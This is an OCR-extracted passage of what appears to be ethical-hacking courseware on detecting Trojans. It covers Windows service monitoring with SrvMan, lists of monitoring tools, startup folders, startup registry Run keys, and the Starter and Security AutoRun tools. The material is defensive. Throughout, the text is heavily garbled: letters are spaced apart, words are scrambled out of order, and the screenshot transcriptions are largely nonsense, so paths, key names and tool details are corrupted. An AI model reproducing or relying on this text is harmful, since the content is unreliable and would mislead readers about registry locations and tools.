c o n t r o l
t o
lo o k
r o o tk i t
H K E Y _ L O C A L _ M A C H I N E \ S y s t e m \ C u r r e n t C o n t r o l S e t \ S e r v i c e s
t o
t h e
like
t a r g e t
a
g e n u i n e
t e c h n i q u e s
r e g i s t r y
m a c h i n e
t o
k e y s
a n d
W i n d o w s
m a n i p u l a t e
t o
h i d e
t h e i r
p r o c e s s e s .
M o d u le 0 6 P a g e 9 6 7
E n t e r p r is e
File
View
Action
S e r v ic e
M a n a g e r
Help
Service Type
‫ •יי‬Regular
C
Drivers
C
All
Refresh
Display Name
Description
Extensible Authentication... @%systemro...
U# Encrypting File System (E... @%SystemR...
Select a workstation <Local Machin
Computer
<Local...
<Local...
<Local...
1 iy s 1 d ! 1 s t 2 9
ft?Windows Event Log
@%SystemR... <Local...
C0M+ Event System
®comres.dll,... <Local...
Function Discovery Provi... @%systemro... <Local...
f t ? Function Discovery Reso... @%systemro... <Local...
Qkf Windows Font Cache Ser... @%systemro... <Local...
d # Windows Presentation Fo... @%SystemR... <Local...
Microsoft FTP Service
@%windir%V.. <Local...
Rrni in Pnlirit Pliprit
✓1n r^l
1S9 Services
1 Computer(s)
Administrator
Status
Stop...
Runn...
Runn...
Runn...
Runn...
Stop...
Stop...
Runn...
Stop...
Runn...
Path
CAWi...
CAWi...
CAPr...
CAWi...
CAWi...
CAWi...
CAWi...
CAWi...
CAWi...
CAWi...
Startup Type
Manual
Automatic
Automatic
Automatic
Automatic
Manual
Manual
Automatic
Manual
Automatic
R 1inn
CAWi
A1
WIN-MSSELCK4K41
A
1--- 1
p
V
10/6/21 ^
FIGURE 6.57: Scanning for Suspicious Windows Services
M o d u le 0 6 P a g e 9 6 8
W
i n d o w
s
S e r v i c e s
W
i n d o w
s
S e r v i c e
M
M
o n i t o r i n g
a n a g e r ^ S
T o o l:
r v M
k n )
W in d o w s S e rv ic e M a n a g e r s im p lifie s a ll c o m m o n ta sks re la te d to W in d o w s s e rv ic e s . It ca n cre a te s e rv ic e s (both
W in 3 2 a n d Legacy D river) w ith o u t re s ta rtin g W in d o w s , d e le te e x istin g s e rv ic e s, a n d ch a n g e s e rv ic e c o n fig u ra tio n
©
Service Manage:‫־‬
File
View
Service
Irtcmol narrc
Help
Stole
■ P ^ D M S y s A ... stepped
runring
tunning
.v>C5N5PD . stepped
>*>CSM5PD.. runring
C5Ndi5LVF steeped
$ DcomLau.. runring
defragsv‫׳‬c
stepped
3 Dei/ceAt stepped
| Dc/colro... stepped
lunrino
‫ &־‬D fs
runring
0 Dftc
O DfsDiivoi
runring
DFSR
runring
fT)D f«no
runring
mnrino
# Dhcp
runring
dijoocho
tunring
^ disk
stepped
dmv*c
Druoack© runring
stepped
9 doOsvc
runring
& OPS
Type
Ci;plcy ra re
Sta-ttjpe
Win32
dnvei
?hared
drive!
drive!
dnvet
?hared
wr!32
thared
*hared
wn32
FS driver
CON-► S^tenAppfcabun
Confole Dri/er
DyptoQiaphic Servces
CSN5HZTS82NDIS Ptyoca D«v«r
CSNEFDTSCac^ VOS Vetoed Dtv<*
C$NdsLV»f HD1S Piacco D t^ f
DCOM Server ftoc«et Laurchy
Optimzc d i/e j
DeviceAssociaian Serve•
D cvcch ita l Servce
nam d
narHiel
00(0
tyrterr
:yjtem
ivsterr
auto
nanod
nanu^l
nonod
>*‫״‬10
tyckrr
FS driver
wr>32
FS driver
thared
drvot
drvoi
drv*t
tharod
ihaed
,h « .d
DFS Nai 1e :w -e
DFS Nanetp-K* Ltont L rv*■
DrS Name«pa~o $ o \«1
D riw
DFS R aplkllan
DrS ricplcabcr RcocC rf> Dtvct
DHCP Cleri
SyttonAtirbjto Cacto
Disk Drivel
drvsc
DNS Ciori
WiedAutoConfg
DiagrcRbc PoJey Ser\»c#
Executable
‫״‬
C:\'‫׳‬vin<1cws\jvs!em32\dlh0?texe /P tc c s s s id y ^ ^ ■
SjstemG^dnvefsScondrv.sys
C.Windcm\i>«lem32'^vd10‫־‬jt exe -k
Sjsten132\Dr1vers>C5N5FDTS8Z syt
J
Sjotcm32\Drivcr»'1CSNEFDT SS2<64. iys
Ss1sem.32\Drivers\C$NdsL'‫׳‬VF. sys
C:\VV1n<Sws\?yst«1n32Uvcho«texe •k DcomL...
C.\'1Vindcvt5\iy5len132'vjvch0jt exe •k defray.
C‫\־‬W 1ndews\iystefruL2Vsvch!Mt exe •k Locals
C:\Windw*\»yalerr02'14vcho»t cxo •k DoomL...
C.\windcv1s\jvstem32l\dfs5vc ew
Sj««n132\Df1vere\d1tc tyf
jy}terr02\dr ivwsSdf*. *ys
C \Wmdews\tj1«t«tvi?VDFSRi »xo
:yjlon
MilO
SSy»terrr1cot''4/jtem32'‫«׳‬dtiver»Vd:«ro 4y«
C \v;ind ev^1^tM T \^sv‫׳‬tho*t «<e •k Locals
S)«flra32\drivef«Vdboocho eyo
S$ysle»rP«X‫>׳‬Syite1n32Sciiv‫׳‬ers\dijk. jys
'Sys1arFeor\Sy8te1n32\e»11/ers\dmvJC sy*
C:\Windcvte\#>ete1r132UvchMt e«0 ■k Melwor...
CAWindw1s\iyslen132\jv‫׳‬ch0it exe •k LocelS..
C\\W1n<lcws\Systen»32\tvcl‫־‬£»st. es-e •k Local
bcc»
MtO
tyjkxx
beet
n-ww.-H
*Ao
r torltd
aUo
v
Rejlart setvice
http://tools.sysprogs. org
Copyright © by EG-GOUIlCil. All Rights Jteservfed'.;Reproduction is Strictly Prohibited.
S o u r c e :
W i n d o w s
s h u t t i n g
r u n
i n d o w
s
M
a n a g e r
S e r v ic e s
( S r v M
M
o n i t o r i n g
T o o l :
W
i n d o w
s
S e r v ic e
a n )
h t t p : / / t o o l s . s y s p r o g s . o r g
W i n d o w s
o t h e r
W
S e r v ic e
s e r v ic e s .
d o w n
a n d
c o n f i g u r a t i o n
a r b i t r a r y
W i n 3 2
M a n a g e r
T h is
c a n
is
r e s t a r t i n g
s e r v ic e s .
a
to o l
g e n e r a t e
It
t h a t
W i n d o w s .
h a s
a p p l i c a t i o n s
a s
a ll o w s
d i f f e r e n t
b o t h
It
G U I
s e r v ic e s .
y o u
s e r v i c e s
c a n
a n d
a ls o
t o
s h o r t e n
f o r
c a n c e l
W i n 3 2
e x is tin g
c c o m m a n d - l i n e
It s u p p o r t s
all
all
a n d
m o d e r n
p u b l ic
t a s k s
L e g a c y
d r iv e r s
s e r v i c e s
m o d e s .
3 2 - b i t
a n d
It c a n
a n d
a ls o
lin k e d
t o
w i t h o u t
m a n i p u l a t e
u s e d
t o
6 4 - b i t v e r s i o n s
b e
o f
W i n d o w s .
M o d u le 0 6 P a g e 9 6 9
File
View
Service
Help
Internal name
State
,^)COMSysA... stopped
condrv
$ CryptSvc
Type
Start type
Win32
Display name
C0M+ System Application
manual
Executable
C: \Windows\system32\dllhost. exe /Processid...
running
driver
Console Driver
manual
System32\drivers\condrv. sys
lunning
shared
Cryptographic Services
auto
C:\Windows\system32\svchost.exe •k Networ...
V C S N 5 P 0 ...
stopped
driver
CSN5PDTS82 NDIS Protocol Driver
system
System32\D rivers\CSN5PD TS82. sys
v,>CSN5P0...
lunning
driver
CSN5PDTS82x64 NDIS Protocol Driver
system
System32\Drivers\CSN5PDTS82x64.sys
->CsNdisLWF stopped
driver
CsNdisLWF NDIS Piotocol Driver
system
System32\Drivers\CsNdisLWF.sys
$ DcomLau... running
defragsvc
stopped
shaied
DCOM Server Process Launcher
auto
C:\Windows\system32\svchost.exe •k DcomL...
Win32
Optimize drives
Device Association Service
manual
C:\Windows\system32\svchost.exe •k defiag...
DeviceAs...
stopped
shaied
Devicelns... stopped
running
■^>Dfs
shated
lunning
Win32
Device Install Service
DFS Namespace
FS dtivet
DFS Namespace Client Driver
manual
C:\Windows\system32\svchost.exe •k LocalS...
manual
C:\Windows\system32\svchost.exe •k DcomL...
auto
system
System32\D rivers\dfsc. sys
C: \Windows\system32\df ssvc. exe
O d s D riv e r
lunning
FS driver
DFS Namespace Server Filter Driver
system
•\fcDFSR
lunning
Win32
DFS Replication
auto
^)D IsrR o
lunning
FS driver
$ Dhcp
tunning
shaied
DFS Replication Readonly Driver
DHCP Client
auto
^ discache
tunning
driver
System Attribute Cache
system
System32\drive1s\discache. sys
disk
tunning
driver
Disk Driver
boot
\SystemR00t\System32\drivers\disk.sys
dmvsc
stopped
driver
dmvsc
manual
\SystemR00t\System32\drivers\dmvsc sys
Dnscache
lunning
stopped
shated
shared
DNS Client
Wired AutoConfig
auto
manual
lunning
shaied
Diagnostic Policy Service
auto
C:\Windows\system32\svchost.exe •k Networ
C:\W1ndows\System32Vsvchost exe •k Local..
3 dot3svc
£ DPS
Properties...
]
|
Add service
]
|
Start service
boot
A
system32\drivers\dfs. sys
C: \Windows\system32\D FSRs. exe
\SystemRoot\system32\dnve1s\dfsrrosys
|
Delete service______________]
V
Restart service
[__________________ Exit
FIGURE 6.58: Windows Service Manager (SrvMan) Tool Screenshot
M o d u le 0 6 P a g e 9 7 0
Windows Services Monitoring
Tools
o
S M A R T U tility
http://www.thewindowsclub.com
CEH
A n V ir Task M a n a g e r
http://www.anvW.com
i
N e tw rix S e rv ic e M o n it o r
http://www.netwrix.com
P ro ce ss H acke r
http://processhacker.sourceforge.net
Free W in d o w s S e rv ic e
V is ta S e rv ic e s O p tim iz e r
http://www.smartpcutilities.com
M o n it o r Tool
http://www.manageengine.com
S e rv iW in
http://www.nirsoft.net
E
O v e rs e e r N e tw o rk M o n it o r
http://www.overseer-network-monitor.com
55
W in d o w s S e rv ic e M a n a g e r
T otal N e tw o rk M o n it o r
http://www.softin\/enti\/e.com
Tray
http://winservicemanager.codeplex.com
W
i n d o w
s
S e r v ic e s
M
o n i t o r i n g
T o o l s
f B
W i n d o w s
r e s t a r t
t h e m
a v a il a b le
S e r v ic e s
a f t e r
in t h e
fa ilu re .
m a r k e t
0
S m a r t
0
N e t w r ix
0
V is ta
0
S e r v iW i n
0
W i n d o w s
©
A n V ir T a s k
0
P r o c e s s
0
F r e e
0
O v e r s e e r
0
T o ta l
U tility
a r e
A
S e r v ic e
t h e
m o n i t o r
W i n d o w s
c ritical
s e r v i c e
W i n d o w s
m o n i t o r i n g
s e r v i c e s
t o o l s
h t t p : / / w w w . n e t w r i x . c o m
O p t i m i z e r
a v a il a b le
a t
h t t p : / / w w w . s m a r t p c u t i l i t i e s . c o m
H a c k e r
T r a y
a v a il a b le
a v a il a b le
S e r v ic e
N e t w o r k
a r e
r e a d ily
M a n a g e r
M a n a g e r
t h a t
o p t io n a l ly
h t t p : / / w w w . t h e w i n d o w s c l u b . c o m
a t
a t
a n d
f o llo w s :
a v a il a b le
S e r v ic e
N e t w o r k
a t
o f
a s
t o o l s
M o n i t o r
a v a il a b le
W i n d o w s
f e w
lis te d
a v a il a b le
S e r v ic e s
M o d u le 0 6 P a g e 9 7 1
m o n i t o r i n g
a t
M o n i t o r
a t
a t
h t t p : / / w i n s e r v i c e m a n a g e r . c o d e p l e x . c o m
h t t p : / / w w w . a n v i r . c o m
h t t p : / / p r o c e s s h a c k e r . s o u r c e f o r g e . n e t
M o n i t o r
M o n i t o r
a v a il a b le
T o o l
a v a il a b le
a v a ila b le
a v a il a b le
a t
a t
a t
h t t p : / / w w w . m a n a g e e n g i n e . c o m
h t t p : / / w w w . o v e r s e e r - n e t w o r k - m o n i t o r . c o m
h t t p : / / w w w . s o f t i n v e n t i v e . c o m
CEH
Check start up program
entries in the registry
Details are covered in next
slide
Check start up folder
C :\P ro g ra m D a ta \M ic ro s o ft
\W in d o w s \S ta rt
M e n u \P ro g ra m s '^ S t a r t u p
©
C :\U s e rs \(U s e rN am e)\A p p D a ta \R o a m in g \
M ic r o s o f t\W in d o w s \S ta r t
M e n u \P ro g ra m s '^ S t a r t u p
Check W indow s services
automatic started
G o to R u n
Check device drivers
automatically loaded
C :\W in d o w s \S y s te m 3 2 \
d riv e rs
Type s e rv ic e s .m s c
-> Sort by S ta rtu p T ype
Check b o o t , i n i
or b e d ( b o o t m g r )
entries
S c a n n i n g
T r o ja n s ,
T h e r e f o r e ,
f o ll o w i n g
S t e p
o n c e
s c a n n i n g
t h e s e
1: C h e c k
S u s p ic io u s
in s ta lle d
f o r
s i m p l e
t h e
f o r
s u s p ic i o u s
s te p s ,
S t a r t u p
y o u
( U s e r - N a m e )
t h e
c o m p u t e r ,
s t a r t u p
c a n
p r o g r a m s
id e n tif y
if t h e r e
P r o g r a m
s t a r t
is
a r e
v e r y
a n y
e s s e n t ia l
h i d d e n
f o r
s
a t
s y s t e m
d e t e c t i n g
s t a r t u p .
T r o ja n s .
B y
T r o ja n s :
f o l d e r
C : \ P r o g r a m D a t a \ M i c r o s o f t \ W
C : \ U s e r s \
o n
S t a r t u p
i n d o w s \ S t a r t
M e n u \ P r o g r a m s \ S t a r t u p
\ A p p D a t a \ R o a m i n g \ M i c r o s o f t : \ W i n d o w s \ S t a r t
M e n u \ P r o g r a m s \ S t a r t u p
S t e p
G o
2:
t o
C h e c k
R u n ,
W i n d o w s
t y p e
s e r v i c e s
s e r v i c e s .m s c ,
S t e p
3:
C h e c k
s t a r t u p
S t e p
4:
C h e c k
t h a t
p r o g r a m
d e v ic e
a u t o m a t i c
a n d
click S o r t
e n t r i e s
d r iv e r s
s t a r t e d
a r e
in t h e
b y
S t a r t u p
T y p e
r e g is tr y
l o a d e d :
C : \ W i n d o w s \ S y s t e m 3 2 \ d r i v e r s
C h e c k
b o o t . i n i
M o d u le 0 6 P a g e 9 7 2
o r b e d
( b o o t m g r )
e n t r i e s
Windows8 Startup Registry
Entries
CEH
(•rtifwd
ithiu l •UtkM
H K L M \S O F T W A R E \M ic ro so ft\W in d o w s\C u rre n tV e rsio n \E x p lo re r\S h e ll F o ld e r s , Cognition S ta rt.u p
E x p lo re r
H K L M \S O F T W A R E \M icro so ft\W indow s\C urrentV ersion\E xplorer\U ser S h e l l F o ld e r s , Common S t a r t u p
S ta rtu p
H K C U \S o ftw a re \M ic r o s o ft\W in d o w s \C u rre n tV e rs io n \E x p lo r e r \S h e ll F o ld e r s , S t a r t u p
S e ttin g
H K C U \S o ftw a re \M ic r o s o ft\W in d o w s \C u rre n tV e rs io n \E x p lo r e r \U s e r S h e l l F o ld e r s , S t a r t u p
H K C U \S o ftw are\M icro so ft\W in d o w s N T \C u rre n tV e rsio n \W in d o w s, lo a d
H K L M \SO FT W A R E\M icrosoft\W indow s\C urrentV ersion\R un
W in d o w s
S ta rtu p
S e ttin g
H K C U \S o ftw a re \M ic ro so ft\W in d o w s \C u rre n tV e rs io n \R u n
H K LM \SO FTW A R E\M icrosoft\W indow s\C urrentV ersion\RunO nce
H K C U \S o ftw a re \M ic ro so ft\W in d o w s\C u rre n tV e rsio n \R u n O n c e
H K C U \S o f tw a r e \M ic r o s o f t\I n te r n e t E x p l o r e r \U rlS e a rc h H o o k s
IE
S ta rtu p
S e ttin g
H K LM \SO FT W A R E\M icrosoft\Internet E x p l o r e r \T o o lb a r
H K LM \SO FTW A RE\M icrosoftM nternet E x p l o r e r \E x te n s io n s
H K C U \SO FTW A R E\M icrosoft\Internet E x p l o r e r \M enuExt
P ro g ra m s th a t ru n o n W in d o w s s ta rtu p ca n b e lo c a te d in th e s e re g is try e n trie s
W
i n d o w
P r o g r a m s
s 8
t h a t
r u n
S t a r t u p
o n
W i n d o w s
R
e g i s t r y
s t a r t u p
c a n
E n t r i e s
b e
l o c a t e d
in t h e s e
r e g is tr y
e n tr i e s :
H K L M \S O F T W A R E \M ic ro s o ft\w in d o w s \C u rre n tv e rs io n \E x p lo re r\S h e ll F o l d e r s , Catmon s t a r t u p
Explorer
H K L M \S O F T W A R E \M ic ro s o ft\W in d o w s \C u rre n tV e rsio n \E x p lo re r\U s e r S h e l l F o l d e r s , Common S t a r t u p
Startup
H K C U \S o f tw a r e \M i c r o s o f t \W i n d o w s \C u r r e n tV e r s io n \E x p lo r e r \S h e l1 F o l d e r s ,
Setting
H K C U \S o f tw a r e \M i c r o s o f t \W i n d o w s \C u r r e n tV e r s io n \E x p lo r e r \U s e r S h e l l F o l d e r ? , S t a r t u p
S ta rtu p
H K C U \S o ftw a re \M ic ro so ft\W in d o w s N T \C u rr e n tV e rs lo n \W in d o w s , l o a d
HKLM\SOFTWARE\M ic r o s o f t\W in d o w s \ C u r r e n tV e r s io n \R u n
W indow s
Startup
Setting
H K C U \S o ftw a re \M ic r o s o ft\W in d o w s \C u rre n tV e rs io n \R u n
H K IM \S O F T W A R E \M ic ro so ft\W in d o w s\C u rre n tV ersio n \R u n O n c e
H K C U \S o ftw a re \M ic r o s o ft\W in d o w s \C u rre n tV e rs lo n \R u n O n c e
H K C U \S o f tw a r e \M i c r o s o f t \I n te r n e t E x p l o r e r \U r lS e a r c h H o o k 3
IE
Startup
Setting
H K L M \S 0 F T W A R E \M ic ro 3 o ft\In te rn e t E x p l o r e r \ T o o l b a r
H K L M \S O F T W A R E \M icrosoftM nternet E x p l o r e r \ E x t e n s i o n s
H K C U \S O F T W A R E \M ic ro so ft\In te rn e t E x p l o r e r \M enuE xt
FIGURE 6.59: Windows8 Startup Registry Entries
M o d u le 0 6 P a g e 9 7 3
Startup Programs Monitoring
Tool: Starter
CEH
Starter is a startup manager for Microsoft Windows
It allows you to view and manage all the programs that are starting automatically whenever
OS is loading
ra
1‫ ם ־‬. x
Starter (Server 4.0)
File Edit Ccnfiguiation Help
a
a
Edit
‫־־״‬
^ Processes |
0
Pioperim
Refreih
3
♦
Cpbont
Vaie
ections
S B tf
% All sections (18)
jU Startup folders (1)
Current user
l i Al l ‫ ״‬ve(1)‫״‬
1
0 t f APC
0 < t f APC
a
Driver D etective
‫ *־‬£ D c / a u l t u s « r
Jg R e q i i t r y ( 1 7)
(3
Abcut
/7 2 m
dtti.exe
( 3 £ ) EMET Not/iar
f>*
J#
R u n (6 1
M R u n O n ce (I)
[7 ] EPSON UD START
□ i r FlBaclcup
All users (10)
H Run (9)
j$ RunOnce
3 RunOnceE...
H R u n S e r v ic e i
3 RunSeivic*..
0 < P qooqle*-ll
(3
GTWhois
(3 -S { . m » n m vyi
1
0
nS.me
Sn:gi: 10.Ink
t v e nM
Title
0
Eratt.. D oscip tb n
^ M a w S iB a B ■
C A P r o g r a m F i l e s « 3 6 . A d . a ‫ ־׳‬c e : P a r e n a l C o n t r o l ' B_
G J > r o g 1a m F i l e t ( * 3 6 ' ^ V d . a n c r d P a t n u ! C o n t r o l * ^ C A P r o g r w n F i e * ( r 3 6 ) \P C D w e n H e a d Q u a r t e r s 'D n v . .
' C : \ P r o g r a m F i * t ‫ ׳‬x 86t < A u U > - T r * J . * » ' d U L w • '
C : \ P r o g r a m F r i e s ( » 86J \ E » e o m s c * t P a s s w o r d R e c o v e r y - .
C : \ P r o g 1a m F i l e s u & ' . E V f T . S I . T I ‫ י ׳‬c t i T w r « • *
' C : \ P . o g r 1W T1 f i n i * S b » . t P S C N P 1o | e < t o r \ f P S 0N U S .
C ^ P r o g r a m F i le s ( 1 5 6 '. N « w $ c f t w 3 r « i J o k k r l o d c s f C : \ P r o q ‫ « ׳‬n f i l e t ( 1 9 6 j ' , G o o g l e ' , G o o ^ i e T a r f k 'q o o g l e * .
C \ P r o g r a m F i l e s ( x M l ' . G c d c T o o t e 'G T W h o a e *
' C : V P 1c g > w n F 4 n U d b i ^ W m d o M i l A « \ ) < l n M n 9« n 1n .
'C : \ P t o g r a m f i n
ik k « V n S W
O V P r o g r a m F i l e s 6t S 6) \ T e < h S » n r t f 1\ S n a g l l 1 > $ n a g i e 3 C : \ W 1n d c M 1V n c M < A 1v < n 1l 2n t
U n H ack M e R o eeb t C h eck
0 & flco m S o ft DPR S .
& Current user (7)
3
□
J 1 Launch
a
:]r r*Seivi
0
0
U ninstall CAUter... 0\W1ndo!MUy£t*m3?.cmdM ‫׳‬q/c imdr /s /q ,C C A W . n d o w s \ S y 5 W o 6 ‫ ״‬A W m F l I m y e»t
a r a W in F lT r a y
9
t? D r f a u lt u s e r
3 Run
3 RunOnce
I 3 N files
11
5 Wmm
Registry - User Run
Registry - Machine Run
RejpKry ‫ ־‬User Run
Regiitry • Machine Run
Reysfty ‫ ־‬User Run
Reyitry • Machine Run
Re^tby ‫ ־‬Machine Run
Rcgisoy User Run
Recpttry • Machine Run
Re^ sory Mach! ne Run
R«y vl‫ >׳‬- Uiw Run
Rvcpttry • Machine Run
Startup AD Users
Reipttry • Machine Run
Regiioy Machine Run‫ ״‬.
R« ary • User RunOnce
Reysoy ‫ ־‬User Run
9
lil) Y e s
fed v «s
₪ Vei
bd
₪
Y d
bdv«
R v‫״‬
₪ YCS
0V«
Elcomsoft Distributed Passwc
EMET Notifiei (Enhanced Mil!
EPSON USB Ditplsy VI M [{P
(Folder Lock)
Goocjlr Talk
lid Yes
Window* live Metienyar
0 V‫״‬
Snegh
Isd Ye
b d V es
hd V «
0 V n
Adobe Readei and Act ‫ם‬bat Manager / 1.6.S.0/Adobe Reader and Acrobat Manager/ Ad>
—
ms—iia —2^2!—*2s!— laamuuhttp://codestuff.tripod, com
r
S t a r t u p
S o u r c e :
S t a r t e r
a ll o w s
s y s t e m
a n d
o f t h e
s o m e
s e l e c t e d
S t a r t e r
e n tr i e s ,
c a n
t o
is
v i e w
a n d
l o a d e d .
e d it t h e m ,
a ls o
( s u c h
list
a s
all
c r e a t e
t h e
u s e d
files,
DLLs,
p r o c e s s .
It
r e q u i r e m e n t s
P o w e r
U s e r s
g r o u p s
M o d u le 0 6 P a g e 9 7 4
s u p p o r t s
m a y
r e q u i r e
h a v e
all
s o
n e w ,
T o o l :
e x c e p t
t o
p r o g r a m s
d e l e t e
u s a g e ,
S t a r t e r
a c c e s s
w o r r y
t h e m
9x,
a
c h a n g e
c o u n t ,
M e ,
A s
e n t r i e s ,
w h e n e v e r
s t a r t u p
t o
f o ld e r s '
t e m p o r a r i l y
t h e
i t e m s
d i s a b l e
p e r m a n e n t l y .
r e g i s tr y
rig h ts .
c h o o s e
w i t h
t h r e a d
s t a r t
r e g i s t r y
c o u ld
a n d
W i n d o w s
o n e :
t h a t
h i d d e n
u s e r
r u n n i n g
M i c r o s o f t
n o t h i n g
t h e
o r
m e m o r y
s p e c ia l
t h e
all t h e
t h a t
p r o c e s s e s
s p e c if ic
s y s t e m
o n i t o r i n g
It e n u m e r a t e s
in itia liz a tio n
a r e
o p e r a t i n g
M
m a n a g e
s e l e c t e d
n o
s
h t t p : / / c o d e s t u f f . t r i p o d . c o m
y o u
o p e r a t i n g
P r o g r a m
N T,
ru le ,
v i e w
e x t e n d e d
p rio ritie s ,
e tc .),
2 0 0 0 ,
2 0 0 3 ,
o p e r a t i o n s
a
t o
X P,
o n
m e m b e r s
a n d
a n d
t o
p r o c e s s '
t e r m i n a t e
V ista .
T h e r e
a
W i n d o w s - N T - b a s e d
o f
A d m i n i s t r a t o r s
a n d
a b o u t .
f5
Starter (Server 4.0)
File
I
Edit
Configuration
‫ט‬
I
a
Nev.
Exit
- 4 StJitupl
9
-
Delete
3
Properties
1
‫ג־‬
Optwm
♦
About
Value
Detacher.
Section
cza e
!E s a z a E E
C:\Program Files (* 86)\Advanced Parental Controf\B.~
Registry • User Run
Yes
(Back Process)
*k
C:\Program Files (x86)\Advanced Parental ControfB...
Registry ■ Machine Run
Yes
(Back Process)
J tt All users (1)
Driver Detective
C:\Program Files («96)\PC Drivers He*dQuarters\Dnv...
Registry ‫ ־‬User Run
£ * Default user
(3
dtn.exe
"C:\Program Files (x86)\Auto-Tracker\dtn.exe"
Registry • Machine Run
ElcomSoft DPR S‫״‬.
C:\Program Files (186)\Ekomsoft Password Recovery...
Registry - User Run
EMET Notrfiei
C:\Program Files (*86)\EMET\EM€T_not1f 1er.tte
₪
t f APC
Current user
Registry (17)
Current user (7)
0
3
Run ($)
0
3
RunOnce (1)
B
S i All users (10)
0
g
&
Yes
Elcomsoft Distributed Passwc
‫ ׳י‬fm
EMET Notifier (Enhanced Mib
"C:\Program Files (*86)\EPSON Projector EPSON US—
C:\Progrem Files (*86)\NewSoftware s\F0Wer Lock\F...
Registry • Uset Run
C:\Program Files (x86)\Google\ Google Talc\googlet...
Registry ‫ ־‬Machine Run
‫ ' י‬Yes
13 Yes
C:\Program Files (x86)\GeekTools\GTWho«s-ece
Yes
"C:\Program Files (x86)\Windows lrve\Messenger\m...
Registry • Uset Run
Yes
"C:\Program Files (x86)\ActrveTracker\m5.exe*
Registry ■ M achine Run
FLBdckup
0
GTWhois
Registry • Machine Run
RunOnce
0
3
RunOnceE...
(3
3
RunSennces
[ 3 ( B Soagrt 10.lnk
C:\Program Files (x86)\TechSm*h\Sn«gft 10»Snag«t3...
Startup
RunServKe...
0
svcnet2
C:\Windows\svcnet2Vsvcnet2.exe
Registry ‫ ־‬Machine Run
<
0
Title
UnHackMe Rootkit Check
Re9« t 1y - Machine Run...
<
m5.exe
All Users
Yes
(Folder Lock)
Google Talk
1
1
3
i l msnmsgr
EPSON US8 Display VI .40 (EP‫־‬
Yes
V‫ ׳‬Yes
‫ן‬
J* EPSON UD START
6
<^> googlttalk
Run (9)
3
Yes
Yes
3
B S 4 Default user
B ^
a
Launch
PI
B &
a
cl
Refresh
S B 63 Name *
Startup folders (1)
B
a
a
Edit
A l sections (18)
^
j
Piocrssn \ 4 b Swvkci
Sections
^
‫־‬H
Hdp
Snagit
«a
fm
3
Run
0
Uninstall C:\User...
C:\W 1nd0i‫ «׳‬systemJ2‫ ־‬cmd.e*e /q /c rmdw /* /q ‫־‬C~.
Registry ■ User RunOnce
Yes
3
RunOnce
(3 B
WmFLTray
G\Wmdows\SysWo*64‫\׳‬W**FLTray.eKe
Registry ■User Run
Yes
Tray ApplKation (Folder Lock
INI files
3 Wwviro
Adobe Reader and Acrobat Manager / 1.6.5.0 / Adobe Reader and Acrobat Manager / Adobe Systems Incorporated
FIGURE 6.60: S tarter Tool Screenshot
M o d u le 0 6 P a g e 9 7 5
Tool: Security AutoRun
ClEH
Urtrftetf t lhKj| N«Im
Security AutoRun displays the list of all applications that are loaded automatically when Windows starts up
_
1
■rj
Security Autorun
-I"
;WIN-MSSElCK4K41/Ac1m1n1strator]
o
«
o
4- — ‫י ־‬
N
S t a r t u p
P r o g r a m
s
M
o n i t o r i n g
T o o l :
S e c u r i t y
A u t o R
u n
S o u r c e :
S e c u r i t y
w h e n
A u t o R u n
W i n d o w s
c o m m o n / u s e r ,
n a m e ,
h t t p : / / t c p m o n i t o r . a l t e r v i s t a . o r g
l o c a t io n
p r o g r a m
t h a t
a ll o w s
s t a r t s
s e r v ic e s ,
in
t h e
r u n s
y o u
u p .
t o
E a c h
d r iv e r s
r e g is tr y
a t
v i e w
list
o f
a p p l i c a t i o n
list,
o r
t h e
is
all
lis te d
c o m m a n d - l i n e
file
s t a r t u p .
s y s t e m ,
a p p l i c a t i o n s
a n d
C o m p a t i b l e
w i t h
s trin g ,
m o r e .
t h a t
t h e
o p e r a t i n g
l o a d e d
d e ta i ls
p r o d u c t
It
a r e
o f
n a m e ,
id e n tif ie s
s y s t e m s
its
file
a
t y p e ,
v e r s i o n ,
s p y w a r e
o f
o r
r e g is try ,
c o m p a n y
a d w a r e
W i n d o w s
a r e
9 x / M E / N T / 2 0 0 0 / X P / V i s t a / 7 .
M o d u le 0 6 P a g e 9 7 6
l s is m
Security Autonvt - [WIN M SStlC K4K4 VAdmmistMtor]
m
o o
4
A
^
* t * O v e ( l)
¥ •alOM
¥ ‫כי*»כ‬0
^ ft
#
1Md nw1
#
tWI<Lr6T*BB0n1x
#
V
O x • CO)
¥ ^ rO n a b
|
ff
| #
fm O J ttx tw * •* *
|
f>t*v«r
|
‫* • י‬H M C U 1
m M I* * O b p a {1 ) | V
c
•
w
C:tMr4^*4aWl*rtrramm«64vX0**F'rt«•
‫<־^ ז‬7‫• ״‬Mh (*•6:600* Ux)•*
« ..
t f-oîn Hn (06! CocÛ*tet»£oo*«jpd•*♦
> N tr
C:»wnd»we7WlMgeit.r*•
4 3) r /a • CX1•
X:ft9l*NN(1M1y^%«nraS4r1<(t^
Si CUUM
A p p |r« 0 lU
B< V3) *•m t
‘ h M
C V r t » X 1 * ‫ ׳‬$ y t 1 ‫־‬V 0 » ^ 4 ‫׳‬y / W / V i f r « » V ■ *
JP Nryca(SS
4 Q > M rl«
C 'A r « M « » r t« ^ « U y w r > K f>* /If
*Opt"*
< * * 0 )0(
|
C:Wndowe)m»e«MWwvc-w
wgon
^ ttikAn){{
WlM/Ri#«<rKX>
) M l | A «M«aa1 1
c:frogr«nN««(>M)CPSONPro^KtorCPiONUS80‫»י‬-
: QSt*ru>W0«r
^ Ta*S<*adJar
♦ ,/ ‫ י‬Star%»
_ S a r t « ( M r v a t > - ( n || 0
C:W*6»««‫*־‬rt*>1Ufcv*0tt.C■* 4***gx
^ w itvipSrM on
g
#
CtfitodowftotfenttVfcott*■*ôcw»*{03D4SP:--.
?aloes
♦‫ ׳‬in stato) Components
g
I
!J k M M IT M i
c:Vr*gr«»Nn {■«)
*w«r*oryPQOtorrvtrv
C:
N*t (■at)<Ar tPop-ot ««<
4 9 miogan
4
|
C:^ftndaw»y»gc<o^J<Tyfwm Brtct<V<^30)l»,W»• •
Nrtwertt lr«w«neQnr P»o
* Sh««Ct»»Kt(0
O
< f ‫«׳‬C U /0e**W >
Cyrtrx**.-*XNY‫׳״‬f*TS*0* V&^0*‫־‬ctxrr
fc M 0»*rt0rr V»*bS4TMCN
*ppk*Sowl*t«r iU M i Strict
^ % rtew!
¥
1
V (re . O il
H tM /S if iO a C i
V ^rS«^(«Ch»
*
j
S*r*ctN««*
• «W$
¥
**caj/*rOx»<i)
5 sun*fcMr) (l)
G # r* rt U av
¥ **»)
N r « n * t* S o r
C: WrêiwWDW<nWwr>r
C
